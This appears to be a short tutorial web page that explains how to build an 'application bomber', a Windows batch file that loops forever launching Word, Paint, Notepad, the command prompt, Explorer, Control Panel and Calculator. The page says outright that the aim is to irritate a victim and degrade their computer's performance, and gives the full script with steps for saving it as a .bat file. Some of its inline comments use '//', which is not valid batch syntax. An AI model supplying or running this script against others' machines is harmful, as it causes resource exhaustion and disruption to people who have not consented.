Application Bomber

Create A Apllication Bomber


This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance. 

Steps To create a Application Bomb


1.Create a new text file "app.txt"


2.write the code given below.

3.Once you have entered your code,you can save the file using the bacth file type.


  • Click File → Save As.
  • Click the "Save as type" dropdown menu.
  • Select "All files".
  • Enter a name for the program followed by .bat or .cmd.
  • Make sure the encoding is ANSI and save the file.

Code For Creating Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x   //loop variable
start winword 
start mspaint  //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

 Thank You

Comments